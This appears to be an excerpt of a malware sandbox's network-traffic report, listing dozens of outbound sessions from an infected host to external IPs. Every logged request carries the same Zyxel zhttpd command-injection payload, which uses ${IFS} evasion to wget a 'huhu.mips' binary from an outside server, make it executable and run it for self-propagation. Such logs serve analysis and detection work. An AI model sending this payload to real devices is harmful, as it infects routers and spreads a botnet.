                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.069631100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1308192.168.2.235328418.243.73.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.069674969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1309192.168.2.2352910175.93.57.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.069700956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1310192.168.2.2351062101.246.195.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.069735050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1311192.168.2.23580365.101.217.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.069773912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1312192.168.2.2349702194.75.165.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.069824934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1313192.168.2.234583267.114.172.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.069868088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1314192.168.2.234569889.98.77.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.069911957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1315192.168.2.2346058176.202.171.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.069942951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1316192.168.2.234229834.136.20.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.069981098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1317192.168.2.2355166202.195.42.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.070009947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1318192.168.2.235175682.224.160.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.070075989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1319192.168.2.2359226198.8.133.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.070136070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1320192.168.2.2358818151.93.72.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.070171118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1321192.168.2.2333668116.199.58.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.070195913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1322192.168.2.2347978144.255.92.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.070233107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1323192.168.2.236085638.32.183.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.070283890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1324192.168.2.2337382209.10.200.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.070317030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1325192.168.2.2341412175.216.207.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.070377111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1326192.168.2.233725859.89.18.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.070426941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1327192.168.2.2334002132.188.101.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.070461988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1328192.168.2.2357736150.242.139.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.070509911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1329192.168.2.2333256205.170.123.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.070527077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1330192.168.2.235132881.36.178.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.070576906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1331192.168.2.234212227.188.247.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.070622921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1332192.168.2.2353314188.57.224.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.070683002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1333192.168.2.234939064.4.34.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.070714951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1334192.168.2.2346702118.10.227.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.070744991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1335192.168.2.2342878207.168.88.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.070791960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1336192.168.2.2336626207.86.224.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.070816994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1337192.168.2.2342904101.112.103.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.070868015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1338192.168.2.234615632.253.95.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.070908070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1339192.168.2.2341576167.154.222.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.070941925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1340192.168.2.2354102177.41.75.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.071000099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1341192.168.2.235905474.139.176.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.071002960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1342192.168.2.2354776194.50.191.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.071053982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1343192.168.2.2339510152.182.156.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.071078062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1344192.168.2.2356120212.108.237.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.071144104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1345192.168.2.233487236.16.23.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.071188927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1346192.168.2.2335118166.227.187.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.071228027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1347192.168.2.235883299.224.164.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.071279049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1348192.168.2.2335570157.108.117.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.071321011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1349192.168.2.2349818173.152.56.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.071352005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1350192.168.2.233312645.203.126.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.071408033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1351192.168.2.2350412167.207.204.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.071455002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1352192.168.2.2346726159.170.67.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.071511984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1353192.168.2.2337962207.32.244.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.071538925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1354192.168.2.233813457.37.207.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.071578979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1355192.168.2.2351322191.113.93.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.071629047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1356192.168.2.2353462185.132.12.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.071650982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1357192.168.2.233877892.142.197.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.071687937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1358192.168.2.2357556164.254.20.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.071719885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1359192.168.2.2359924135.130.36.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.071754932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1360192.168.2.235963067.56.157.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.071796894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1361192.168.2.2349992165.120.208.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.071844101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1362192.168.2.2344752142.71.213.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.071882963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1363192.168.2.2347528183.182.146.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.071934938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1364192.168.2.236045423.0.167.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.071954012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1365192.168.2.2334702163.48.214.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.071990013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1366192.168.2.235565674.140.116.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.072024107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1367192.168.2.2359650198.252.233.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.072069883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1368192.168.2.2338772199.156.68.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.072128057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1369192.168.2.234542417.131.65.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.072176933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1370192.168.2.235583453.186.133.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.072221994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1371192.168.2.2334728200.68.56.225443
                                                TimestampBytes transferredDirectionData
